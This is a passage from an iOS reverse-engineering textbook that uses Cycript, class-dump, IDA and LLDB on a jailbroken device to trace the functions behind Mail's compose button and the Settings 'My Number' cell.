   |    |    |    |    |    | <UIToolbar: 0x146f62a0; frame = (0 524; 320 44); opaque = 
NO; autoresize = W+TM; layer = <CALayer: 0x146f6420>>  
   |    |    |    |    |    |    | <_UIToolbarBackground: 0x14607ed0; frame = (0 0; 320 
44); autoresize = W; userInteractionEnabled = NO; layer = <CALayer: 0x14607d40>>  
   |    |    |    |    |    |    |    | <_UIBackdropView: 0x15829590; frame = (0 0; 320 
44); opaque = NO; autoresize = W+H; userInteractionEnabled = NO; layer = 
<_UIBackdropViewLayer: 0x158297e0>>  
   |    |    |    |    |    |    |    |    | <_UIBackdropEffectView: 0x14509020; frame = 
(0 0; 320 44); clipsToBounds = YES; opaque = NO; autoresize = W+ H; 
userInteractionEnabled = NO; layer = <CABackdropLayer: 0x145a68d0>>  
   |    |    |    |    |    |    |    |    | <UIView: 0x147335c0; frame = (0 0; 320 44); 
hidden = YES; opaque = NO; autoresize = W+H; userInteractionEnabled = NO; layer = 
<CALayer: 0x14 5f3ab0>>  

 
199    |    |    |    |    |    |    | <UIImageView: 0x14725730; frame = (0 -0.5; 320 0.5); 
autoresize = W+BM; userInteractionEnabled = NO; layer = <CALayer: 0x1472be40>>  
   |    |    |    |    |    |    | <MailStatusBarView: 0x146c4110; frame = (69 0 ; 182 
44); opaque = NO; autoresize = BM; layer = <CALayer: 0x146f9f90>>  
Let’s repeat the operation to hide UIToolBar:  
cy# [#0x146c4110 setHidden:NO]  
cy# [#0x146f62a0 setHidden:YES]  
The effect is shown in figure 6 -13: 
  
Figure 6- 13 UIToolBar is hidden 
This time, the button is hidden, which means the button is a subview of UIToolBar. Look 
for keyword “ button ” in subviews of UIToolBar, and we can easily locate UIToolbarButton:  
   |    |    |    |    |    |    | <MailStatusBarView: 0x146c4110; frame = (69 0; 182 
44); opaque = NO; autoresize = BM; layer = <CALayer: 0x146f9f90>>  
   |    |    |    |    |    |    |    | <MailStatusUpdateView: 0x146e6060; frame = (0 0; 
182 44); opaque = NO; autoresize = W+H; layer = <CALayer: 0x146c8840>>  
   |    |    |    |    |    |    |    |    | <UILabel: 0x14609610; frame = (40 21.5; 102 
13.5); text = ‘3 Unsent Messages’; opaque = NO; userInteractionEnabled = NO; layer = 
<_UILabelLayer: 0x146097f0>>  
   |    |    |    |    |    |    |    |    | <UILabel: 0x145f3020; frame = ( 43 8; 96.5 
13.5); text = ‘Updated Just Now’; opaque = NO; userInteractionEnabled = NO; layer = 
<_UILabelLayer: 0x145f2e50>>  
   |    |    |    |    |    |    | <UIToolbarButton: 0x14798410; frame = (285 0; 23 44); 
opaque = NO; gestureRecognizers = <NSArray:  0x14799510>; layer = <CALayer: 0x14798510>>  
Let’s see whether it is “compose ” button with the following commands:  
cy# [#0x146f62a0 setHidden:NO] 
cy# [#0x14798410 setHidden:YES]  
The button is hidden as expected, as shown in figure 6 -14: 

 
200   
Figure 6- 14 Button is hidden  
Now, we have successfully located “compose ” button, and its description is 
<UIToolbarButton: 0x14798410; frame = (285 0; 23 44); opaque = NO; gestureRecognizers = 
<NSArray: 0x14799510>; layer = <CALayer: 0x14798510>>. Next, we need to find  out its UI 
function. 
3.   Find out UI function of “compose” button 
UI function of a button is its response method after tapping it. Usually we use [UIControl 
addTarget:action:forControlEvents:] to add a response method to a UIView object (I haven ’t 
seen any exceptions so far). Meanwhile, the method [UIControl 
actionsForTarget:forControlEvent:] offers a way to get the response method of a UIControl 
object. Based on this, as long as the view we get in the last step is a subclass of UIControl (Again, 
I haven’ t see n any exceptions so far), we can find out its response method. More specifically in 
this example, we do it like this:  
cy# button = #0x14798410  
#"<UIToolbarButton: 0x14798410; frame = (285 0; 23 44); hidden = YES; opaque = NO; 
gestureRecognizers = <NSArray:  0x14799510>; layer = <CALayer: 0x14798510>>"  
cy# [button allTargets]  
[NSSet setWithArray:@[#"<ComposeButtonItem: 0x14609d00>"]]]  
cy# [button allControlEvents]  
64 
cy# [button actionsForTarget:#0x14609d00 forControlEvent:64]  

 
201 @["_sendAction:withEvent:"]  
Therefore, after tapping “compose ” button, Mail calls [ComposeButtonItem 
_sendAction:withEvent:], we have successfully found the response method. Inject with Cycript, 
locate UI control object, and then find out its UI function, it ’s fairly easy as you see.  If you still 
don’ t get it, we will repeat these steps on MobilePhoneSettings, please pay attention.  
1.   Inject Cycript into MobilePhoneSettings 
You should be very familiar with the following operation for now:  
FunMaker -5:~ root# ps -e | grep /Applications  
  596 ??         0:01.50 
/Applications/MessagesNotificationViewService.app/MessagesNotificationViewService  
  623 ??         0:08.55 /Applications/InCallService.app/InCallService  
  748 ??         0:01.36 /Applications/MobileMail.app/MobileMail  
  750 ??         0:01.82 /Applications/Preferences.app/Preferences  
  755 ttys000    0:00.01 grep /Applications  
FunMaker -5:~ root# cycript -p Preferences  
Be careful, Settings App’ s name is Preferences. It will show frequently in this chapter, please 
keep an eye. 
2.   Examine the view hierarchy of “Phone” view, and locate the top cell 
As usual, let ’s take a look at the view hierarchy first:  
cy# ?expand  
expand == true  
cy# [[UIApp keyWindow] recursiveDescription]  
@"<UIWindow: 0x17d62e00; frame = (0 0; 320 568); autoresize = H; gestureRecognizers = 
<NSArray: 0x17d589b0>; layer = <UIWindowLayer: 0x17d21c60>>  
   | <UILayoutContainerView: 0x17d86620; frame = (0 0; 320 568); autoresize = W+H; layer 
= <CALayer: 0x17d863b0>>  
   |    | <UIView: 0x17ef2430; frame = (0 0; 320 0); layer = <CALayer: 0x17ef24a0>>  
   |    | <UILayoutContainerView: 0x17d7eb80; frame = (0 0; 320 568); clipsToBounds = 
YES; gestureRecognizers = <NSArray: 0x17eb6400>; layer = <CALayer: 0x17d7ed60>>  
...... 
   |    |    |    |    |    |    |    |    |    |    | <PSTableC ell: 0x17f92890; 
baseClass = UITableViewCell; frame = (0 35; 320 44); text = ‘My Number’; autoresize = W; 
tag = 2; layer = <CALayer: 0x17f92a60>>  
   |    |    |    |    |    |    |    |    |    |    |    | <UITableViewCellContentView: 
0x17f92ad0; frame = ( 0 0; 287 43.5); gestureRecognizers = <NSArray: 0x17f92ce0>; layer = 
<CALayer: 0x17f92b40>>  
   |    |    |    |    |    |    |    |    |    |    |    |    | <UITableViewLabel: 
0x17f92d30; frame = (15 12; 90 20.5); text = ‘My Number’; userInteractionEnabled = NO; 
layer = <_UILabelLayer: 0x17f92df0>>  
   |    |    |    |    |    |    |    |    |    |    |    |    | <UITableViewLabel: 
0x17f93060; frame = (132.5 12; 152.5 20.5); text = ‘+86PhoneNumber’; 
userInteractionEnabled = NO; layer = <_UILabelLayer: 0x17f93 120>> 
 
202 It’s easy to locate the control object that shows “+86PhoneNumber ”, and we can say for 
sure its cell is a PSTableCell object without test. Try to hide this cell to verify our guesses:  
cy# [#0x17f92890 setHidden:YES]  
Now, MobilePhoneSettings looks l ike figure 6- 15: 
  
Figure 6- 15 Hide the top cell  
So the description of the top cell is <PSTableCell: 0x17f92890; baseClass = 
UITableViewCell; frame = (0 35; 320 44); text = ‘My Number ’; autoresize = W; tag = 2; layer = 
<CALayer: 0x17f92a60>>. Unlike “compose ” button, our current target is not the response 
method of this cell (i.e. function), but the content (i.e. data) it shows, hence 
actionsForTarget:forControlEvent: is no longer our choice. Facing this kind of situation, what 
shall we do?  
In most cas es, data we are interested in would not be a constant. If this data is constantly 1, I 
believe you won’ t be interested at all. So, when our target is a variable, one question needs to be 
thought about: where does the variable come from?  
Any variable does n ot come from nowhere. It originates from a data source and is generated 
by a specific algorithm. Usually, our focus is on that algorithm, namely, how the data source 
becomes the variable. This process is usually comprised of multiple functions, which form a call 
chain like the pseudo code below:  
id dataSource = ?; // head  

 
203 id a = function(dataSource);  
id b = function(a);  
id c = function(b);  
... 
id z = function(y);  
NSString *myPhoneNumber = function(z); // tail  
The variable is already known, and we’ re at the t ail of the call chain. Reverse engineering, as 
its name suggests, enables us to track from the tail back to the head. In this process we will find 
out every function in this chain, so that we can regenerate the whole algorithm. In a nutshell, to 
regenerate  the algorithm is to record every data source (data source ’s data source, and so on. 
Hereafter referred to as the Nth data source) and the trace of function calls along the trip. When the Nth data source of the variable is a determined data (say in this ch apter, the Nth data source 
is the SIM card), the functions between Nth data source and variable is the algorithm. Confused? It’ll become clearer after this example.  
3.   Find the UI function of the top cell 
  
Figure 6- 16 MVC design pattern, taken from Stanford  CS 193P 
According to MVC design pattern (as shown in figure 6 -16), M stands for model, namely, 
the data source, which is unknown; V stands for view, namely, the top cell, which is known; C 
stands for controller, which is unknown. M and V has no direct rel ations, while C can directly 
access both M and V, hence  is the communication center of MVC. If we can make use of the 
known V to acquire C, can ’t we access M via C to get the data source? This method is logically 
accessible, is it practicable?  
Based on my professional experiences so far, getting C from V is 100% doable; the key is the 
public method [UIResponder nextResponder], which has the same position to recursiveDescription in my heart. Its description is:  

 
204 “The UIResponder class does not store or set the next responder automatically, instead 
returning nil by default. Subclasses must override this method to set the next responder. 
UIView implements this method by returning the UIViewController object that manages it (if 
it has one) or its superview (if it doesn’ t); UIViewController implements the method by 
returning its view ’s superview; UIWindow returns the application object, and UIApplication 
returns nil. ” 
It means that for a V, the return value of nextResponder is either the corresponding C or its 
superview. Because none of M, V or C can be absent in an App, C exists fore sure, namely, there 
must be a [V nextResponder] that returns a C. Besides, we can get all Vs from 
recursiveDescription, so getting C from known V is approachable, then M is not far f rom us.  
Therefore, our current target is to get C of the top cell, and it ’s relatively easy; keep calling 
nextResponder from cell, until a C is returned:  
cy# [#0x17f92890 nextResponder]  
#"<UITableViewWrapperView: 0x17eb4fc0; frame = (0 0; 320 504); gesture Recognizers = 
<NSArray: 0x17ee5230>; layer = <CALayer: 0x17ee5170>; contentOffset: {0, 0}; 
contentSize: {320, 504}>"  
cy# [#0x17eb4fc0 nextResponder]  
#"<UITableView: 0x16c69e00; frame = (0 0; 320 568); autoresize = W+H; gestureRecognizers 
= <NSArray: 0x17f4 ace0>; layer = <CALayer: 0x17f4ac20>; contentOffset: {0, -64}; 
contentSize: {320, 717.5}>"  
cy# [#0x16c69e00 nextResponder]  
#"<UIView: 0x17ebf2b0; frame = (0 0; 320 568); autoresize = W+H; layer = <CALayer: 
0x17ebf320>>"  
cy# [#0x17ebf2b0 nextResponder]  
#"<PhoneSettingsController 0x17f411e0: navItem <UINavigationItem: 0x17dae890>, view 
<UITableView: 0x16c69e00; frame = (0 0; 320 568); autoresize = W+H; gestureRecognizers = 
<NSArray: 0x17f4ace0>; layer = <CALayer: 0x17f4ac20>; contentOffset: {0, -64}; 
contentS ize: {320, 717.5}>>"  
As soon as we get C, we can search in C ’s header for clues of M. In this example, first we 
need to locate the binary that contains PhoneSettingsController, we aren ’t sure whether it 
comes from Preferences.app or a certain PreferenceBundle. In this case, a simple test would be 
all good:  
FunMaker -5:~ root# grep -r PhoneSettingsController /Applications/Preferences.app/  
FunMaker -5:~ root# grep -r PhoneSettingsController /System/Library/  
Binary file /System/Library/Caches/com.a pple.dyld/dyld_shared_cache_armv7s matches  
grep: /System/Library/Caches/com.apple.dyld/enable -dylibs-to-override -cache: No such 
file or directory  
grep: /System/Library/Frameworks/CoreGraphics.framework/Resources/libCGCorePDF.dylib: No 
such file or director y 
grep: /System/Library/Frameworks/CoreGraphics.framework/Resources/libCMSBuiltin.dylib: 
No such file or directory  
grep: /System/Library/Frameworks/CoreGraphics.framework/Resources/libCMaps.dylib: No 
such file or directory  
grep: /System/Library/Frameworks/ System.framework/System: No such file or directory  
 
205 Binary file /System/Library/PreferenceBundles/MobilePhoneSettings.bundle/Info.plist 
matches 
It seems that this class comes from MobilePhoneSettings.bundle. Next, class -dump its binary 
and open PhoneSettin gsController.h: 
@interface PhoneSettingsController : PhoneSettingsListController 
<TPSetPINViewControllerDelegate>  
...... 
- (id)myNumber:(id)arg1;  
- (void)setMyNumber:(id)arg1 specifier:(id)arg2;  
...... 
- (id)tableView:(id)arg1 cellForRowAtIndexPath:(id)arg2;  
 
@end 
From the above snippet, we know the first 2 methods have obvious relationships with my 
number. While in a more general manner, the 3rd method is used for initializing all cells, it can 
be regarded as the UI function of cells. Therefore, data source of the top cell certainly lies in 
these 3 methods, and we ’ll take the 3rd method as an example. Let ’s set a breakpoint at the end 
of [PhoneSettingsController tableView:cellForRowAtIndexPath:] with LLDB, and see if the return value contains my number. Attach deb ugserver to Preferences, then connect LLDB to 
debugserver, and check the ASLR offset of MobilePhoneSettings:  
(lldb) image list - o -f 
[  0] 0x00078000 
/private/var/db/stash/_.29LMeZ/Applications/Preferences.app/Preferences(0x000000000007c0
00) 
[  1] 0x002310 00 /Library/MobileSubstrate/MobileSubstrate.dylib(0x0000000000231000)  
[  2] 0x06db3000 /Users/snakeninny/Library/Developer/Xcode/iOS DeviceSupport/8.1 
(12B411)/Symbols/System/Library/PrivateFrameworks/BulletinBoard.framework/BulletinBoard  
[  3] 0x06db3000 /Users/snakeninny/Library/Developer/Xcode/iOS DeviceSupport/8.1 
(12B411)/Symbols/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation  
...... 
[322] 0x06db3000 /Users/snakeninny/Library/Developer/Xcode/iOS DeviceSupport/8.1 
(12B411)/Symbols/System/L ibrary/PreferenceBundles/MobilePhoneSettings.bundle/MobilePhone
Settings  
...... 
As we can see, the ASLR offset of MobilePhoneSettings is 0x6db3000. Then check the 
address of the last instruction in [PhoneSettingsController tableView:cellForRowAtIndexPath:], 
as shown in figure 6 -17: 
 
206   
Figure 6- 17 [PhoneSettingsController tableView:cellForRowAtIndexPath:]  
Because the return value is stored in R0, let ’s set the breakpoint at “ADD SP, SP, #8” , then 
re-enter MobilePhoneSettings to trigger the breakpoint. Print R0 out when the process stops, an 
initialized cell should be ready by then:  
(lldb) br s -a 0x2c965c2c  
Breakpoint 2: where = MobilePhoneSettings` -[PhoneSettingsController 
tableView:cellForRowAtIndexPath:] + 236, address = 0x2c965c2c  
Process 115525 stopped  
* thread #1: tid = 0x1c345, 0x2c965c2c MobilePhoneSettings` -[PhoneSettingsController 
tableView:cellForRowAtIndexPath:] + 236, queue = ‘com.apple.main -thread, stop reason = 
breakpoint 2.1  
    frame #0: 0x2c965c2c MobilePhoneSettings` -[PhoneSettingsController 
tableView:cellForRowAtIndexPath:] + 236  
MobilePhoneSettings` -[PhoneSettingsController tableView:cellForRowAtIndexPath:] + 236:  
-> 0x2c965c2c:  add    sp, #8  
   0x2c965c2e:  pop    {r4, r5, r6, r7, pc}  
 
MobilePhoneSettings` -[PhoneSettingsController applicationWillSuspend]:  
   0x2c965c30:  push   {r7, lr}  
   0x2c965c32:  mov    r7, sp  
(lldb) po $r0  
<PSTableCell: 0x15f41440; baseClass = UITableViewCell; frame = (0 0; 320 44); text = ‘My 
Number’; tag = 2; layer = <CALayer: 0x15f4c930>>  
(lldb) po [$r0 su bviews] 
<__NSArrayM 0x17060e50>(  
<UITableViewCellContentView: 0x15ed0660; frame = (0 0; 320 44); gestureRecognizers = 
<NSArray: 0x15f491e0>; layer = <CALayer: 0x15ed06d0>>,  
<UIButton: 0x15f26f50; frame = (302 16; 8 13); opaque = NO; userInteractionEnabled = NO; 
layer = <CALayer: 0x15f27050>>  
) 
 
(lldb) po [$r0 detailTextLabel]  
<UITableViewLabel: 0x15eb3480; frame = (0 0; 0 0); text = ‘+86PhoneNumber’; 
userInteractionEnabled = NO; layer = <_UILabelLayer: 0x15eb3540>>  
As the output suggests, UI function of th e top cell is indeed [PhoneSettingsController 
tableView:cellForRowAtIndexPath:], we have done a great job so far. We are confident that by 
digging into PhoneSettingsController we ’ll finally get M, and there must be clues about M in 
tableView:cellForRowAtIn dexPath:. We’ ll witness this in the next section.  
One thing to note, iOS games ’ UI are generally not constructed with UIKit, so 
recursiveDescription and nextResponder don ’t work on games. As rookie reverse engineers, I 
don’ t suggest you take games as targe ts. After understanding this book, if you want to reverse 
games, welcome to http://bbs.iosre.com  for discussion. 

 
207 6.2.2    Locate the target function from the UI function  
Successfully getting the UI function is a perfect beginning. UI functions have close ties with 
UI, namely, if we call [ComposeButtonItem _sendAction:withEvent:] to compose an email, or 
call [PhoneSettingsController tableView:cellForRowAtIndexPath:] to get my number, a lot of 
correlated events will happen on UI, such as the view will be refreshed, the layout will be 
updated, etc. It is over reacting. In most cases, we just want to stay low and perform the functions without interrupting the UI. So what should we do when facing this kind of challenge? 
As deve lopers, I  assume you have the most basic programmatic knowledge: the lowest level 
functions are written directly in assembly, which are far from us for now; the remaining 
functions are all nested called. Since UI functions are rather high level functions, they certainly 
nested call our target functions, which can be shown as the following pseudo code:  
drink GetRegular(water arg)  
{ 
 Functions();  
 return MakeRegular(arg);  
} 
 
drink GetDiet(void)  
{ 
 Functions();  
 return MakeDiet();  
} 
 
drink GetZero(void)  
{ 
 Functions();  
 return MakeZero();  
} 
 
drink GetCoke(sugar arg1, water arg2, color arg3)  
{ 
 if (arg1 > 0 && arg1 < 3) return GetDiet();  
 else if (arg1 == 0) return GetZero();  
 return GetRegular(arg2);  
} 
 
drink Get7Up(void)  
{ 
 Functions();  
 return Make7Up();  
} 
 
drink GetMirinda(void)  
{ 
 Functions();  
 return MakeMirinda();  
} 
 
drink GetPepsi(sugar arg1, water arg2, color arg3)  
 
208 { 
 if (arg3 == clear) Get7Up();  
 else if (arg3 == orange) GetMirinda();  
 return GetRegular(arg2);  
} 
 
array GetDrinks(sugar arg1, color arg2)  // UIFunction  
{ 
 drink coke = GetCoke(arg1, 100, arg3);  
 drink pepsi = GetPepsi(arg1, 105, arg3);  
 return ArrayWithComponents(coke, pepsi)  
} 
We don ’t want to be served with coke and pepsi at the same time (you can regard them as 
UI functions). If we only want to drink 7Up (data), we need to find Get7Up (target function 
which generates the data); if we want to know how Zero is made (function), we need to find 
MakeZero (target function which provides function). Actually, the “nest” of nested called 
functions are also consists of chains, so if we can get to know any link of the chain, we can 
regenerate the whole chain by reverse engineering, and the tools  we mainly use are IDA and 
LLDB. Let ’s continue with the previous 2 examples to learn how to find target functions of 
“compose email ” and “ get my number ” by referring to [ComposeButtonItem 
_sendAction:withEvent:] and [PhoneSettingsController tableView:cell ForRowAtIndexPath:]. 
1.   Look for the target function of  “compose email” 
Drag and drop MobileMail in IDA, and search [ComposeButtonItem 
_sendAction:withEvent:] in functions window, as shown in figure 6 -18. 
  
Figure 6- 18 [ComposeButtonItem _sendAction:withEvent:] is not found  
Where is [ComposeButtonItem _sendAction:withEvent:]? Now that ComposeButtonItem 
doesn’ t implement this method, it ’s supposed to be implemented in its super class. Open 
ComposeButtonItem.h and see which class it inherits  from: 
@interface ComposeButtonItem : LongPressableButtonItem  

 
209 +(id)composeButtonItem;  
@end 
Then open LongPressableButtonItem.h, and see whether it implements 
_sendAction:withEvent:.  
@interface LongPressableButtonItem : UIBarButtonItem  
{ 
    id _longPressTarget;  
    SEL _longPressAction;  
} 
 
- (void)_attachGestureRecognizerToView:(id)arg1;  
- (id)createViewForNavigationItem:(id)arg1;  
- (id)createViewForToolbar:(id)arg1;  
- (void)longPressGestureRecognized:(id)arg1;  
- (void)setLongPressTarget: (id)arg1 action:(SEL)arg2;  
 
@end 
It doesn’ t implement this method either, so let ’s proceed to its super class. Open 
UIBarButtonItem.h:  
@interface UIBarButtonItem : UIBarItem <NSCoding>  
...... 
- (void)_sendAction:(id)arg1 withEvent:(id)arg2;  
...... 
@end 
UIBarButtonItem does implement this method, so it ’s UIKit that we should analyze. Drag 
and drop the binary into IDA, since UIKit is big in size, it takes a rather long time to be analyzed. 
During waiting time, how about dropping in http://bbs.iosre.com  for a chat?  
After the initial analysis of UIKit, let ’s go to the implementation of [UIBarButtonItem 
_sendAction:withEvent:], as shown in figure 6 -19. 
  
Figure 6- 19 [UIBarButtonItem _sendAction:withEvent:]  
The first functio n to be called is objc_msgSend. Its official documentation is: 
“When it encounters a method call, the compiler generates a call to one of the functions 
objc_msgSend, objc_msgSend_stret, objc_msgSendSuper, or objc_msgSendSuper_stret. 
Messages sent to an object ’s superclass (using the super keyword) are sent using 

 
210 objc_msgSendSuper; other messages are sent using objc_msgSend. Methods that have data 
structures as return values are sent using objc_msgSendSuper_stret and 
objc_msgSend_stret. ” 
According to the relationship of “object ”, “method ” and “ implementation ” in chapter 5, 
[receiver message] becomes objc_msgSend(receiver, @selector(message)) after compilation; 
when there are arguments in the method, [receiver message:arg1 foo:arg2 bar:arg3] becomes 
objc_ms gSend(receiver, @selector(message), arg1, arg2, arg3), etc. Based on this, the first 
objc_msgSend actually executes an Objective -C method. So what exactly is the method? Who ’s 
the receiver, and what are the arguments?  
Still remember “ sentence of the book ”? 
 “The first 4 arguments are saved in R0, R1, R2 and R3; the rest are saved on the stack; the 
return value is saved in R0. ” 
According to the sentence, at ARM level, objc_msgSend works in the format of 
objc_msgSend(R0, R1, R2, R3, *SP, *(SP + sizeOfLastArg) , ...), and the corresponding Objective -
C method is [R0 R1:R2 foo:R3 bar:*SP baz:*(SP + sizeOfLastArg) qux:...]. :Let ’s apply this 
format to the first objc_msgSend; if we’ re to reproduce its corresponding Objective -C method, 
you have to find out what ’s in R0, R1, R2, R3 and SP before “BLX.W _objc_msgSend ”. This 
kind of backward analysis is worthy of the name reverse engineering. Let ’s try it out.  
Before “BLX.W _objc_msgSend ”, the latest assignment of R0 comes from “MOV R0, R10 ”, 
thus R0 comes from R10; the latest assignment of R10 comes from “MOV R10, R0 ”, thus R10 
comes from R0. Before “MOV R10, R0 ”, R0 is directly used without assignment; this seems 
illogical, but such an obvious “bug”  is impossible to exist, it’ s us that may have made a mistake. 
So R0 must be assigned somewhere. Here comes the question, where is this “somewhere” ? 
Given that there is no assignment of R0 inside [UIBarButtonItem _sendAction:withEvent:], 
the only possibility is that it ’s assigned in the caller of [UIBarButtonItem 
_sendAction:withEvent:]. [UIBarButtonItem _sendAction:withEvent:] becomes objc_msgSend(UIBarButtonItem, @selector(_sendAction:withEvent:), action, event) after 
compilation, and 4 arguments are stored separately in R0~R3. So when [UIBarButt onItem 
_sendAction:withEvent:] gets called, R0 is UIBarButtonItem, so is R0 in “MOV R10, R0 ” and 
“BLX.W _objc_msgSend ”. Still confused? Refer to figure 6- 20, I bet you can understand.  
 
211   
Figure 6- 20 R0’ s evolution 
Similarly, before “BLX.W _objc_msgSend ”, the latest assignment of R1 comes from “MOV 
R1, R4 ”, thus R1 comes from R4; the latest assignment of R4 comes from “LDR R4, [R0] ”, thus 
R4 comes from *R0, i.e. “action”  which is already commented out in IDA. The evolution of R1 
is shown in figure 6- 21: 
  
Figure 6- 21 R1’ s change process  
So after reproduction , the first objc_msgSend becomes [self action], and the return value is 
stored in R0, right? Next, the process judges whether [self action] is 0. If it is 0, there will be no 
actions; otherwise, it branc hes to figure 6 -22: 

 
212   
Figure 6- 22 [UIBarButtonItem _sendAction:withEvent:]  
There ’re 4 objc_msgSends, let’ s analyze them with the same thought one by one:  
R0 of the 1st objc_msgSend comes from “LDR R0, [R2] ”, and IDA has already figured out 
that [R2] is a UIApplication class; R1 comes from “LDR R1, [R0] ”, i.e. “ sharedApplication” . So 
the 1st objc_msgSend is actually [UIApplication sharedApplication], and the return value is 
stored in R0.  
R0 of the 2nd objc_msgSend comes from “MOV R0, R10 ”, i.e. R10; in figur e 6-20, we can 
see that R10 is UIBarButtonItem; R1 comes from “MOV R1, R4 ”, i.e. R4; in figure 6- 21, R4 is 
“action” . So, the 2nd objc_msgSend is actually [UIBarButtonItem action], and the return value is 
stored in R0.  
R0 of the 3rd objc_msgSend comes from “MOV R0, R10 ”, i.e. UIBarButtonItem; R1 comes 
from “ LDR R1, [R0] ”, i.e. “ target ”. Therefore, the 3rd objc_msgSend is actually 
[UIBarButtonItem target], and the return value is stored in R0.  
R0 of the 4th objc_msgSend comes from “MOV R0, R5 ”, i.e. R5; R5 comes from “MOV R5, 
R0” under the 1st objc_msgSend, i.e. R0. What’ s R0? Because the 1st objc_msgSend stores its 
return value in R0, R0 is the return value of [UIApplication sharedApplication] as well the 1st 
argument of the 4th objc_msgSend. R1 comes from “LDR R1, [R0] ”, i.e. 
“sendAction:to:from:forEvent: ”, which has 4 arguments. Since objc_msgSend already has 2 
arguments, there ’re 6 arguments in total, R0~R3 are not enough to hold all arguments, the last 
2 arguments have to be stored on the stack. R2 comes f rom “MOV R2, R4 ”, i.e. R4; R4 comes 
from “ MOV R4, R0 ” under the 2nd objc_msgSend, i.e. R0; R0 comes from the return value of 
the 2nd objc_msgSend, i.e. [UIBarButtonItem action], which is the 3rd argument. R3 comes 

 
213 from “ MOV R3, R0 ” under the 3rd objc_msgSend, i.e. R0; R0 comes from the return value of 
the 3rd objc_msgSend, i.e. [UIBarButtonItem target], which is the 4th argument. The rest 2 
arguments come from the stack, and before the 4th objc_msgSend, the latest change of stack 
comes from “STRD.W R10, R11 , [SP]” , i.e. R10 and R11 are saved onto the stack; therefore, the 
rest 2 arguments are R10 and R11. R10 is UIBarButtonItem, which is discussed several times; whereas R11 comes from “MOV R11, R3 ” in figure 6- 21, i.e. R3, which is another unassigned 
register, so it must come from the caller of [UIBarButtonItem _sendAction:withEvent:]. Based on our previous analysis, R11 is the 2nd argument of _sendAction:withEvent:, i.e. event. The 
relationship of these 4 arguments is a little complicated, hope figure 6 -23 and 6- 24 can give you a 
better illustration. 
 
214   
Figure 6- 23 The relationship of objc_msgSend ’s arguments  
  
Figure 6- 24 The relationship of objc_msgSend ’s arguments  
So, seems the core of [UIBarButtonItem _sendAction:withEvent:] is [[UIApplication 
sharedApplication] sendAction:[self action] to:[self target] from:self forEvent:event]. Since we 
have already known that [UIBarButtonItem _sendAction:withEvent:] will perform  “compose 
mail ” operation, [[UIApplication sharedApplication] sendAction:[self action] to:[self target] 
from:self forEvent:event] is sure to get called. Although with IDA, we ’ve sorted out where 
every argument comes from, IDA can ’t tell us what their value s are during execution. So, it ’s 
time to bring LLDB on stage to do some dynamic debugging.  
Attach debugserver to MobileMail, and connect with LLDB, then print out the ASLR offset 
of UIKit:  
(lldb) image list -o -f 

 
215 [  0] 0x0008e000 
/private/var/db/stash/_.29 LMeZ/Applications/MobileMail.app/MobileMail(0x0000000000092000
) 
[  1] 0x00393000 /Library/MobileSubstrate/MobileSubstrate.dylib(0x0000000000393000)  
[  2] 0x06db3000 /Users/snakeninny/Library/Developer/Xcode/iOS DeviceSupport/8.1 
(12B411)/Symbols/usr/lib/li barchive.2.dylib  
...... 
[ 45] 0x06db3000 /Users/snakeninny/Library/Developer/Xcode/iOS DeviceSupport/8.1 
(12B411)/Symbols/System/Library/Frameworks/UIKit.framework/UIKit  
...... 
ASLR offset of UIKit is 0x6db3000. Let’ s check out the address of the 4th objc_msgSend, as 
shown in figure 6 -25. 
  
Figure 6- 25 Check out address of objc_msgSend  
Set a breakpoint at 0x6db3000 + 0x2501F6F8 = 0x2BDD26F8, then tap “compose ” button to 
trigger it and inspect the arguments of [[UIApplication sharedApplication] sendActi on:[self 
action] to:[self target] from:self forEvent:eventFromArg2]:  
(lldb) br s - a 0x2BDD26F8 
Breakpoint 4: where = UIKit`- [UIBarButtonItem(UIInternal) _sendAction:withEvent:] + 116, 
address = 0x2bdd26f8  
Process 44785 stopped  
* thread #1: tid = 0xaef1, 0x 2bdd26f8 UIKit` -[UIBarButtonItem(UIInternal) 
_sendAction:withEvent:] + 116, queue = ‘com.apple.main -thread, stop reason = breakpoint 
4.1 
    frame #0: 0x2bdd26f8 UIKit` -[UIBarButtonItem(UIInternal) _sendAction:withEvent:] + 
116 
UIKit`-[UIBarButtonItem(UIIn ternal) _sendAction:withEvent:] + 116:  
-> 0x2bdd26f8:  blx    0x2c3539f8                ; symbol stub for: roundf$shim  
   0x2bdd26fc:  add    sp, #8  
   0x2bdd26fe:  pop.w  {r10, r11}  
   0x2bdd2702:  pop    {r4, r5, r7, pc}  
(lldb) p (char *)$r1  
(char *) $48  = 0x2c3de501 "sendAction:to:from:forEvent:"  
(lldb) po $r0  
<MailAppController: 0x176a8820>  
(lldb) po $r2  
[no Objective -C description available]  
(lldb) p (char *)$r2  
(char *) $51 = 0x2d763308 "composeButtonClicked:"  
(lldb) po $r3  
<nil> 
(lldb) x/10 $sp  
0x00391198: 0x1776d640 0x176a8ce0 0x1760f5e0 0x00000000  
0x003911a8: 0x2c4140f2 0x1776ff50 0x003911cc 0x2bc6ec2b  
0x003911b8: 0x176a8ce0 0x00000001  
(lldb) po 0x1776d640  
<ComposeButtonItem: 0x1776d640>  
(lldb) po 0x176a8ce0  

 
216 <UITouchesEvent: 0x176a8ce0> timesta mp: 58147.4 touches: {(  
    <UITouch: 0x1895e2b0> phase: Ended tap count: 1 window: <UIWindow: 0x17759c30; frame 
= (0 0; 320 568); gestureRecognizers = <NSArray: 0x1775c7a0>; layer = <UIWindowLayer: 
0x1752e190>> view: <UIToolbarButton: 0x1776ff50; frame = (285 0; 23 44); opaque = NO; 
gestureRecognizers = <NSArray: 0x17758670>; layer = <CALayer: 0x17770160>> location in 
window: {308, 534} previous location in window: {304.5, 534} location in view: {23, 10} 
previous location in view: {19.5, 10}  
)} 
The first 4 arguments of objc_msgSend, i.e. R0~R3 are intuitive. They ’re self, 
@selector(sendAction:to:from:forEvent:), the argument of sendAction:, and the argument of 
to:. One thing to mention is that when I entered “po $r2” , LLDB said “no Objective -C 
description available ”, indicating R2 wasn ’t an Objective- C object. Thus, combining with the 
meaning of “action” , I guessed it was a SEL, so I used “p (char *)$r2 ” to print it. How to analyze 
those arguments in the stack? Because SP points to the bottom of stack while  the rest 2 
arguments are on the stack, and they are both one word long, I ’ve printed out the continuous 10 
words from the bottom of the stack using “x/10 $sp ”, and the first 2 were the arguments on 
stack. Most Objective- C arguments are one word long point ers, which point at Objective -C 
objects, so I’ ve “po”ed the first 2 words, they were the arguments. For ease of understanding, 
the relationship of SP, values on the stack and arguments are shown in figure 6 -26. 
 
217   
